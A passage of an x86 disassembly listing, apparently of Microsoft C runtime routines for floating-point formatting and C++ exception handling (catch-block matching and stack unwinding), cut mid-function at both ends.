; ---------------------------------------------------------------------------
loc_42C988: ; CODE XREF: sub_42C8F0+77�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
add edx, [ecx+4]
mov [ebp+var_4], edx
loc_42C994: ; CODE XREF: sub_42C8F0+96�j
cmp [ebp+arg_4], 0
jle loc_42CA26
push 1
mov eax, [ebp+var_4]
push eax
call sub_42CB80
add esp, 8
mov ecx, [ebp+var_4]
mov dl, ds:byte_453DF4
mov [ecx], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+4], 0
jge short loc_42CA26
movsx edx, [ebp+arg_C]
test edx, edx
jz short loc_42C9DE
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
neg ecx
mov [ebp+arg_4], ecx
jmp short loc_42CA04
; ---------------------------------------------------------------------------
loc_42C9DE: ; CODE XREF: sub_42C8F0+DF�j
mov edx, [ebp+arg_8]
mov eax, [edx+4]
neg eax
cmp [ebp+arg_4], eax
jge short loc_42C9F3
mov ecx, [ebp+arg_4]
mov [ebp+var_10], ecx
jmp short loc_42C9FE
; ---------------------------------------------------------------------------
loc_42C9F3: ; CODE XREF: sub_42C8F0+F9�j
mov edx, [ebp+arg_8]
mov eax, [edx+4]
neg eax
mov [ebp+var_10], eax
loc_42C9FE: ; CODE XREF: sub_42C8F0+101�j
mov ecx, [ebp+var_10]
mov [ebp+arg_4], ecx
loc_42CA04: ; CODE XREF: sub_42C8F0+EC�j
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+var_4]
push eax
call sub_42CB80
add esp, 8
mov ecx, [ebp+arg_4]
push ecx
push 30h
mov edx, [ebp+var_4]
push edx
call sub_41E4B0
add esp, 0Ch
loc_42CA26: ; CODE XREF: sub_42C8F0+A8�j
; sub_42C8F0+D7�j
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn
sub_42C8F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CA30 proc near ; CODE XREF: sub_42CB20+55�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
mov [ebp+var_30], 0
lea eax, [ebp+var_14]
mov [ebp+var_38], eax
lea ecx, [ebp+var_2C]
push ecx
lea edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
mov edx, [eax]
push edx
call sub_432CE0
add esp, 10h
mov eax, [ebp+var_38]
mov ecx, [eax+4]
sub ecx, 1
mov [ebp+var_34], ecx
mov edx, [ebp+var_38]
xor eax, eax
cmp dword ptr [edx], 2Dh
setz al
mov ecx, [ebp+arg_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_38]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_432BE0
add esp, 0Ch
mov edx, [ebp+var_38]
mov eax, [edx+4]
sub eax, 1
xor ecx, ecx
cmp [ebp+var_34], eax
setl cl
mov [ebp+var_30], cl
mov edx, [ebp+var_38]
mov eax, [edx+4]
sub eax, 1
mov [ebp+var_34], eax
cmp [ebp+var_34], 0FFFFFFFCh
jl short loc_42CABB
mov ecx, [ebp+var_34]
cmp ecx, [ebp+arg_8]
jl short loc_42CAD7
loc_42CABB: ; CODE XREF: sub_42CA30+81�j
push 1
mov edx, [ebp+var_38]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
call sub_42C710
add esp, 14h
jmp short loc_42CB11
; ---------------------------------------------------------------------------
loc_42CAD7: ; CODE XREF: sub_42CA30+89�j
movsx eax, [ebp+var_30]
test eax, eax
jz short loc_42CAFB
loc_42CADF: ; CODE XREF: sub_42CA30+C2�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
test edx, edx
jz short loc_42CAF4
jmp short loc_42CADF
; ---------------------------------------------------------------------------
loc_42CAF4: ; CODE XREF: sub_42CA30+C0�j
mov ecx, [ebp+var_4]
mov byte ptr [ecx-2], 0
loc_42CAFB: ; CODE XREF: sub_42CA30+AD�j
push 1
mov edx, [ebp+var_38]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_42C8F0
add esp, 10h
loc_42CB11: ; CODE XREF: sub_42CA30+A5�j
mov esp, ebp
pop ebp
retn
sub_42CA30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CB20 proc near ; CODE XREF: sub_427F60+6AD�p
; DATA XREF: sub_420170+3�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_42CB2F
cmp [ebp+arg_8], 45h
jnz short loc_42CB49
loc_42CB2F: ; CODE XREF: sub_42CB20+7�j
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42C690
add esp, 10h
jmp short loc_42CB7D
; ---------------------------------------------------------------------------
loc_42CB49: ; CODE XREF: sub_42CB20+D�j
cmp [ebp+arg_8], 66h
jnz short loc_42CB65
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42C880
add esp, 0Ch
jmp short loc_42CB7D
; ---------------------------------------------------------------------------
loc_42CB65: ; CODE XREF: sub_42CB20+2D�j
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42CA30
add esp, 10h
loc_42CB7D: ; CODE XREF: sub_42CB20+27�j
; sub_42CB20+43�j
pop ebp
retn
sub_42CB20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CB80 proc near ; CODE XREF: sub_42C710+2F�p
; sub_42C8F0+7F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jz short loc_42CBAC
mov eax, [ebp+arg_0]
push eax
call sub_41BC70
add esp, 4
add eax, 1
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_0]
add edx, [ebp+arg_4]
push edx
call sub_420840
add esp, 0Ch
loc_42CBAC: ; CODE XREF: sub_42CB80+7�j
pop ebp
retn
sub_42CB80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CBB0 proc near ; CODE XREF: sub_420420+27�p
; sub_420500+2C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 19930520h
jnz short loc_42CBCA
mov [ebp+var_8], 0
jmp short loc_42CBD2
; ---------------------------------------------------------------------------
loc_42CBCA: ; CODE XREF: sub_42CBB0+F�j
call sub_42D910
mov [ebp+var_8], eax
loc_42CBD2: ; CODE XREF: sub_42CBB0+18�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, 66h
test edx, edx
jz short loc_42CC0E
mov eax, [ebp+arg_10]
cmp dword ptr [eax+4], 0
jz short loc_42CC04
cmp [ebp+arg_14], 0
jnz short loc_42CC04
push 0FFFFFFFFh
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_4]
push eax
call sub_42D120
add esp, 10h
loc_42CC04: ; CODE XREF: sub_42CBB0+36�j
; sub_42CBB0+3C�j
mov eax, 1
jmp loc_42CC9B
; ---------------------------------------------------------------------------
loc_42CC0E: ; CODE XREF: sub_42CBB0+2D�j
mov ecx, [ebp+arg_10]
cmp dword ptr [ecx+0Ch], 0
jz short loc_42CC96
mov edx, [ebp+arg_0]
cmp dword ptr [edx], 0E06D7363h
jnz short loc_42CC6E
mov eax, [ebp+arg_0]
cmp dword ptr [eax+14h], 19930520h
jbe short loc_42CC6E
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [edx+8]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_42CC6E
mov ecx, [ebp+arg_1C]
and ecx, 0FFh
push ecx
mov edx, [ebp+arg_18]
push edx
mov eax, [ebp+arg_14]
push eax
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call [ebp+var_4]
add esp, 20h
jmp short loc_42CC9B
; ---------------------------------------------------------------------------
loc_42CC6E: ; CODE XREF: sub_42CBB0+70�j
; sub_42CBB0+7C�j ...
mov eax, [ebp+arg_18]
push eax
mov ecx, [ebp+arg_14]
push ecx
mov dl, byte ptr [ebp+arg_1C]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42CCA0
add esp, 20h
loc_42CC96: ; CODE XREF: sub_42CBB0+65�j
mov eax, 1
loc_42CC9B: ; CODE XREF: sub_42CBB0+59�j
; sub_42CBB0+BC�j
mov esp, ebp
pop ebp
retn
sub_42CBB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CCA0 proc near ; CODE XREF: sub_42CBB0+DE�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 30h
mov [ebp+var_8], 0
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0FFFFFFFFh
jl short loc_42CCCD
mov edx, [ebp+arg_10]
mov eax, [ebp+var_4]
cmp eax, [edx+4]
jge short loc_42CCCD
mov [ebp+var_28], 0
jmp short loc_42CCD5
; ---------------------------------------------------------------------------
loc_42CCCD: ; CODE XREF: sub_42CCA0+17�j
; sub_42CCA0+22�j
call sub_42D910
mov [ebp+var_28], eax
loc_42CCD5: ; CODE XREF: sub_42CCA0+2B�j
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx], 0E06D7363h
jnz loc_42CD95
mov edx, [ebp+arg_0]
cmp dword ptr [edx+10h], 3
jnz loc_42CD95
mov eax, [ebp+arg_0]
cmp dword ptr [eax+14h], 19930520h
jnz loc_42CD95
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+1Ch], 0
jnz loc_42CD95
call sub_428EE0
cmp dword ptr [eax+6Ch], 0
jnz short loc_42CD1E
jmp loc_42CF3C
; ---------------------------------------------------------------------------
loc_42CD1E: ; CODE XREF: sub_42CCA0+77�j
call sub_428EE0
mov edx, [eax+6Ch]
mov [ebp+arg_0], edx
call sub_428EE0
mov eax, [eax+70h]
mov [ebp+arg_8], eax
mov [ebp+var_8], 1
push 1
mov ecx, [ebp+arg_0]
push ecx
call sub_432F80
add esp, 8
test eax, eax
jz short loc_42CD53
mov [ebp+var_2C], 0
jmp short loc_42CD5B
; ---------------------------------------------------------------------------
loc_42CD53: ; CODE XREF: sub_42CCA0+A8�j
call sub_42D910
mov [ebp+var_2C], eax
loc_42CD5B: ; CODE XREF: sub_42CCA0+B1�j
mov edx, [ebp+arg_0]
cmp dword ptr [edx], 0E06D7363h
jnz short loc_42CD8E
mov eax, [ebp+arg_0]
cmp dword ptr [eax+10h], 3
jnz short loc_42CD8E
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+14h], 19930520h
jnz short loc_42CD8E
mov edx, [ebp+arg_0]
cmp dword ptr [edx+1Ch], 0
jnz short loc_42CD8E
call sub_42D910
mov [ebp+var_30], eax
jmp short loc_42CD95
; ---------------------------------------------------------------------------
loc_42CD8E: ; CODE XREF: sub_42CCA0+C4�j
; sub_42CCA0+CD�j ...
mov [ebp+var_30], 0
loc_42CD95: ; CODE XREF: sub_42CCA0+3E�j
; sub_42CCA0+4B�j ...
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 0E06D7363h
jnz loc_42CEFC
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+10h], 3
jnz loc_42CEFC
mov edx, [ebp+arg_0]
cmp dword ptr [edx+14h], 19930520h
jnz loc_42CEFC
lea eax, [ebp+var_C]
push eax
lea ecx, [ebp+var_14]
push ecx
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+arg_18]
push eax
mov ecx, [ebp+arg_10]
push ecx
call sub_4206A0
add esp, 14h
mov [ebp+var_10], eax
jmp short loc_42CDF4
; ---------------------------------------------------------------------------
loc_42CDE2: ; CODE XREF: sub_42CCA0:loc_42CE15�j
; sub_42CCA0:loc_42CEDA�j
mov edx, [ebp+var_14]
add edx, 1
mov [ebp+var_14], edx
mov eax, [ebp+var_10]
add eax, 14h
mov [ebp+var_10], eax
loc_42CDF4: ; CODE XREF: sub_42CCA0+140�j
mov ecx, [ebp+var_14]
cmp ecx, [ebp+var_C]
jnb loc_42CEDF
mov edx, [ebp+var_10]
mov eax, [edx]
cmp eax, [ebp+var_4]
jg short loc_42CE15
mov ecx, [ebp+var_10]
mov edx, [ebp+var_4]
cmp edx, [ecx+4]
jle short loc_42CE17
loc_42CE15: ; CODE XREF: sub_42CCA0+168�j
jmp short loc_42CDE2
; ---------------------------------------------------------------------------
loc_42CE17: ; CODE XREF: sub_42CCA0+173�j
mov eax, [ebp+var_10]
mov ecx, [eax+10h]
mov [ebp+var_1C], ecx
mov edx, [ebp+var_10]
mov eax, [edx+0Ch]
mov [ebp+var_24], eax
jmp short loc_42CE3D
; ---------------------------------------------------------------------------
loc_42CE2B: ; CODE XREF: sub_42CCA0:loc_42CED5�j
mov ecx, [ebp+var_24]
sub ecx, 1
mov [ebp+var_24], ecx
mov edx, [ebp+var_1C]
add edx, 10h
mov [ebp+var_1C], edx
loc_42CE3D: ; CODE XREF: sub_42CCA0+189�j
cmp [ebp+var_24], 0
jle loc_42CEDA
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ecx+0Ch]
add edx, 4
mov [ebp+var_18], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ecx+0Ch]
mov eax, [edx]
mov [ebp+var_20], eax
jmp short loc_42CE78
; ---------------------------------------------------------------------------
loc_42CE66: ; CODE XREF: sub_42CCA0+1FB�j
mov ecx, [ebp+var_20]
sub ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+var_18]
add edx, 4
mov [ebp+var_18], edx
loc_42CE78: ; CODE XREF: sub_42CCA0+1C4�j
cmp [ebp+var_20], 0
jle short loc_42CED5
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
push ecx
mov edx, [ebp+var_18]
mov eax, [edx]
push eax
mov ecx, [ebp+var_1C]
push ecx
call sub_42D060
add esp, 0Ch
test eax, eax
jnz short loc_42CE9D
jmp short loc_42CE66
; ---------------------------------------------------------------------------
loc_42CE9D: ; CODE XREF: sub_42CCA0+1F9�j
mov dl, [ebp+var_8]
push edx
mov eax, [ebp+arg_1C]
push eax
mov ecx, [ebp+arg_18]
push ecx
mov edx, [ebp+var_10]
push edx
mov eax, [ebp+var_18]
mov ecx, [eax]
push ecx
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42D250
add esp, 2Ch
jmp short loc_42CF3A
; ---------------------------------------------------------------------------
loc_42CED5: ; CODE XREF: sub_42CCA0+1DC�j
jmp loc_42CE2B
; ---------------------------------------------------------------------------
loc_42CEDA: ; CODE XREF: sub_42CCA0+1A1�j
; sub_42CCA0:loc_42CF3A�j
jmp loc_42CDE2
; ---------------------------------------------------------------------------
loc_42CEDF: ; CODE XREF: sub_42CCA0+15A�j
mov edx, [ebp+arg_14]
and edx, 0FFh
test edx, edx
jz short loc_42CEFA
push 1
mov eax, [ebp+arg_0]
push eax
call sub_42D730
add esp, 8
loc_42CEFA: ; CODE XREF: sub_42CCA0+24A�j
jmp short loc_42CF38
; ---------------------------------------------------------------------------
loc_42CEFC: ; CODE XREF: sub_42CCA0+FE�j
; sub_42CCA0+10B�j ...
mov ecx, [ebp+arg_14]
and ecx, 0FFh
test ecx, ecx
jnz short loc_42CF33
mov edx, [ebp+arg_1C]
push edx
mov eax, [ebp+arg_18]
push eax
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42CF40
add esp, 20h
jmp short loc_42CF38
; ---------------------------------------------------------------------------
loc_42CF33: ; CODE XREF: sub_42CCA0+267�j
call sub_42D860
loc_42CF38: ; CODE XREF: sub_42CCA0:loc_42CEFA�j
; sub_42CCA0+291�j
jmp short loc_42CF3C
; ---------------------------------------------------------------------------
loc_42CF3A: ; CODE XREF: sub_42CCA0+233�j
jmp short loc_42CEDA
; ---------------------------------------------------------------------------
loc_42CF3C: ; CODE XREF: sub_42CCA0+79�j
; sub_42CCA0:loc_42CF38�j
mov esp, ebp
pop ebp
retn
sub_42CCA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CF40 proc near ; CODE XREF: sub_42CCA0+289�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 0Ch
call sub_428EE0
cmp dword ptr [eax+68h], 0
jz short loc_42CF7E
mov eax, [ebp+arg_1C]
push eax
mov ecx, [ebp+arg_18]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_420540
add esp, 1Ch
test eax, eax
jz short loc_42CF7E
jmp loc_42D051
; ---------------------------------------------------------------------------
loc_42CF7E: ; CODE XREF: sub_42CF40+F�j
; sub_42CF40+37�j
lea ecx, [ebp+var_4]
push ecx
lea edx, [ebp+var_C]
push edx
mov eax, [ebp+arg_14]
push eax
mov ecx, [ebp+arg_18]
push ecx
mov edx, [ebp+arg_10]
push edx
call sub_4206A0
add esp, 14h
mov [ebp+var_8], eax
jmp short loc_42CFB1
; ---------------------------------------------------------------------------
loc_42CF9F: ; CODE XREF: sub_42CF40:loc_42D009�j
; sub_42CF40+10C�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_8]
add ecx, 14h
mov [ebp+var_8], ecx
loc_42CFB1: ; CODE XREF: sub_42CF40+5D�j
mov edx, [ebp+var_C]
cmp edx, [ebp+var_4]
jnb loc_42D051
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_14]
cmp ecx, [eax]
jl short loc_42D009
mov edx, [ebp+var_8]
mov eax, [ebp+arg_14]
cmp eax, [edx+4]
jg short loc_42D009
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
sub edx, 1
shl edx, 4
mov eax, [ebp+var_8]
mov ecx, [eax+10h]
cmp dword ptr [ecx+edx+4], 0
jz short loc_42D00B
mov edx, [ebp+var_8]
mov eax, [edx+0Ch]
sub eax, 1
shl eax, 4
mov ecx, [ebp+var_8]
mov edx, [ecx+10h]
mov eax, [edx+eax+4]
movsx ecx, byte ptr [eax+8]
test ecx, ecx
jz short loc_42D00B
loc_42D009: ; CODE XREF: sub_42CF40+85�j
; sub_42CF40+90�j
jmp short loc_42CF9F
; ---------------------------------------------------------------------------
loc_42D00B: ; CODE XREF: sub_42CF40+A9�j
; sub_42CF40+C7�j
push 1
mov edx, [ebp+arg_1C]
push edx
mov eax, [ebp+arg_18]
push eax
mov ecx, [ebp+var_8]
push ecx
push 0
mov edx, [ebp+var_8]
mov eax, [edx+0Ch]
sub eax, 1
shl eax, 4
mov ecx, [ebp+var_8]
mov edx, [ecx+10h]
add edx, eax
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42D250
add esp, 2Ch
jmp loc_42CF9F
; ---------------------------------------------------------------------------
loc_42D051: ; CODE XREF: sub_42CF40+39�j
; sub_42CF40+77�j
mov esp, ebp
pop ebp
retn
sub_42CF40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D060 proc near ; CODE XREF: sub_42CCA0+1EF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp dword ptr [eax+4], 0
jz short loc_42D07B
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
movsx eax, byte ptr [edx+8]
test eax, eax
jnz short loc_42D085
loc_42D07B: ; CODE XREF: sub_42D060+B�j
mov eax, 1
jmp loc_42D112
; ---------------------------------------------------------------------------
loc_42D085: ; CODE XREF: sub_42D060+19�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
mov eax, [ecx+4]
cmp eax, [edx+4]
jz short loc_42D0B7
mov ecx, [ebp+arg_4]
mov edx, [ecx+4]
add edx, 8
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
add ecx, 8
push ecx
call sub_41F7E0
add esp, 8
test eax, eax
jz short loc_42D0B7
xor eax, eax
jmp short loc_42D112
; ---------------------------------------------------------------------------
loc_42D0B7: ; CODE XREF: sub_42D060+31�j
; sub_42D060+51�j
mov edx, [ebp+arg_4]
mov eax, [edx]
and eax, 2
test eax, eax
jz short loc_42D0CF
mov ecx, [ebp+arg_0]
mov edx, [ecx]
and edx, 8
test edx, edx
jz short loc_42D108
loc_42D0CF: ; CODE XREF: sub_42D060+61�j
mov eax, [ebp+arg_8]
mov ecx, [eax]
and ecx, 1
test ecx, ecx
jz short loc_42D0E7
mov edx, [ebp+arg_0]
mov eax, [edx]
and eax, 1
test eax, eax
jz short loc_42D108
loc_42D0E7: ; CODE XREF: sub_42D060+79�j
mov ecx, [ebp+arg_8]
mov edx, [ecx]
and edx, 2
test edx, edx
jz short loc_42D0FF
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 2
test ecx, ecx
jz short loc_42D108
loc_42D0FF: ; CODE XREF: sub_42D060+91�j
mov [ebp+var_4], 1
jmp short loc_42D10F
; ---------------------------------------------------------------------------
loc_42D108: ; CODE XREF: sub_42D060+6D�j
; sub_42D060+85�j ...
mov [ebp+var_4], 0
loc_42D10F: ; CODE XREF: sub_42D060+A6�j
mov eax, [ebp+var_4]
loc_42D112: ; CODE XREF: sub_42D060+20�j
; sub_42D060+55�j
mov esp, ebp
pop ebp
retn
sub_42D060 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D120 proc near ; CODE XREF: _0:0042047A�p
; sub_42CBB0+4C�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D328
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFECh
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
mov [ebp+var_1C], ecx
loc_42D14F: ; CODE XREF: sub_42D120+BF�j
mov edx, [ebp+var_1C]
cmp edx, [ebp+arg_C]
jz loc_42D1E4
cmp [ebp+var_1C], 0FFFFFFFFh
jle short loc_42D175
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_1C]
cmp ecx, [eax+4]
jge short loc_42D175
mov [ebp+var_20], 0
jmp short loc_42D17D
; ---------------------------------------------------------------------------
loc_42D175: ; CODE XREF: sub_42D120+3F�j
; sub_42D120+4A�j
call sub_42D910
mov [ebp+var_20], eax
loc_42D17D: ; CODE XREF: sub_42D120+53�j
mov [ebp+var_4], 0
mov edx, [ebp+arg_8]
mov eax, [edx+8]
mov ecx, [ebp+var_1C]
cmp dword ptr [eax+ecx*8+4], 0
jz short loc_42D1B0
push 103h
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+arg_8]
mov ecx, [eax+8]
mov edx, [ebp+var_1C]
mov eax, [ecx+edx*8+4]
push eax
call sub_42D810
loc_42D1B0: ; CODE XREF: sub_42D120+72�j
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42D1D0
; ---------------------------------------------------------------------------
mov ecx, [ebp+var_14]
push ecx
call sub_42D220
add esp, 4
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 0FFFFFFFFh
loc_42D1D0: ; CODE XREF: sub_42D120+97�j
mov edx, [ebp+arg_8]
mov eax, [edx+8]
mov ecx, [ebp+var_1C]
mov edx, [eax+ecx*8]
mov [ebp+var_1C], edx
jmp loc_42D14F
; ---------------------------------------------------------------------------
loc_42D1E4: ; CODE XREF: sub_42D120+35�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+arg_C]
jnz short loc_42D1F5
mov [ebp+var_24], 0
jmp short loc_42D1FD
; ---------------------------------------------------------------------------
loc_42D1F5: ; CODE XREF: sub_42D120+CA�j
call sub_42D910
mov [ebp+var_24], eax
loc_42D1FD: ; CODE XREF: sub_42D120+D3�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_1C]
mov [ecx+8], edx
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42D120 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D220 proc near ; CODE XREF: sub_42D120+9D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov eax, [edx]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0E06D7363h
jz short loc_42D241
jmp short loc_42D246
; ---------------------------------------------------------------------------
loc_42D241: ; CODE XREF: sub_42D220+1D�j
call sub_42D860
loc_42D246: ; CODE XREF: sub_42D220+1F�j
xor eax, eax
mov esp, ebp
pop ebp
retn
sub_42D220 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D250 proc near ; CODE XREF: sub_42CCA0+22B�p
; sub_42CF40+104�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
cmp [ebp+arg_18], 0
jz short loc_42D27A
mov ecx, [ebp+arg_18]
push ecx
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42D4B0
add esp, 10h
loc_42D27A: ; CODE XREF: sub_42D250+10�j
cmp [ebp+arg_24], 0
jnz short loc_42D28F
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+arg_4]
push eax
call sub_4203C0
jmp short loc_42D29C
; ---------------------------------------------------------------------------
loc_42D28F: ; CODE XREF: sub_42D250+2E�j
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_24]
push edx
call sub_4203C0
